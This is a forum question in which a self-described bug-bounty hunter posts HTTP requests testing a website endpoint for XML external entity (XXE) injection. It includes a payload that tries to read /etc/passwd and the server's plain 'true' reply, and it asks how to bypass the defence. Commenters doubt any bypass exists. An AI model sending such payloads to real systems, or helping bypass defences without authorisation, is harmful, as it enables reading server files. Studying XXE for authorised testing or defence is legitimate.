# My XXE payload get no response about the file I want to exploit

Tags: xml, xxe

I am a hacker and now I am hunting for securty holes(bugs) to get the bounty. Yesterday, when I am bug hunting on a website, I saw a request like this:

```
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies

account_id=28605113
```

I was thinking about testing for XXE:

```
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example.com/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies

<?xml version="1.0" encoding="UTF-8"?>
<account_id>28605113</account_id>
```

And awesome! It works! I was followed new user by using XML content ====> XXE vulnerability

And then I decided to exploit it by this request:

```
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example.com/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><account_id>&xxe;</account_id>
```

But i just get a response look like this:

```
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=utf-8
Strict-Transport-Security: max-age=31536000
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=Edge,chrome=1
ETag: "b326b5062b2f0e69046810717534cb09"
Set-Cookie: _example_session_id=7e9aa24785793d803b3917a45377b0cb; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT; HttpOnly
Set-Cookie: __cu_id=28945505; domain=.example.com; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
Set-Cookie: __cu_short_name=; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
Set-Cookie: __cu=%7B%22initial%22%3A%22%26%22%2C%22mixpanel_id%22%3A%2216e9cc289603ab-0a7935d33e069a-2393f61-15f900-16e9cc289614cb%22%2C%22created_at%22%3A1574588876%2C%22days_since_creation%22%3A0%2C%22plan_info%22%3A%7B%22id%22%3A-1%2C%22type%22%3A10%7D%2C%22features_with_plan%22%3A0%2C%22trial_info%22%3Anull%2C%22picture%22%3A%7B%22thumb_url%22%3Anull%7D%2C%22authorizationToken%22%3A%22b0128945505............................4bd802ced0b90c02e9c75e6284c87a32........................................1574588876164...........1574761676164...........YugborL0iXfMQ7sZDP2GWw%7E%7E00000000000000....................................%22%2C%22authorizationTokenExpiresAt%22%3A%222019-11-26T09%3A47%3A56.172Z%22%2C%22timezone%22%3A%22Asia%2FHo_Chi_Minh%22%7D; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
X-Request-Id: 9439a64c3fcbe97f7c061c68f35b6f79
X-Runtime: 0.432708
Content-Length: 4
Date: Sun, 24 Nov 2019 13:01:05 GMT
Connection: close
X-Served-By: cache-jfk8121-JFK, cache-hkg17925-HKG
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1574600465.789233,VS0,VE681
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, private, must-revalidate, max-age=0, max-stale=0, post-check=0, pre-check=0
Expires: 0
Pragma: no-cache
Age: 0
Via: 1.1 varnish
Accept-Ranges: bytes

true
```

Not thing happens! The file I want to read doesn't appear. The only thing appears just a 'true' response.
Look like my XXE payload isn't working. I have try a lot but it still doesn't work, nothing happens, just only that simple response. 
Is there any hacker know how to exploit it, help me, please, I will thank you so much!
(Sorry if bad English)

Comment: Perhaps the site has just put a basic defence in place against crude XXE attacks like this. It's not exactly hard to do.

Comment: So do you know how to bypass the defence? I think must be have some ways to exploit it! Just like perform a SQL injection through Cloudflare, special this just a BASIC defence, it just block the system response! I think this may be a XXE OOB, but I have try it and nothing happens.

Comment: If the people running the site have done their work properly, then there is no way of defeating their defences. Obviously.

Comment: That's not true. Hacker can bypass XXS filter, SQL injection defence, SSRF whitelist, ... The important is how advanced of the defence and is there any mistake in the defence. This defence just general, so I sill believe that there is a way to everything working properly

Comment: If you think it can be done, then I await your demonstration of the fact.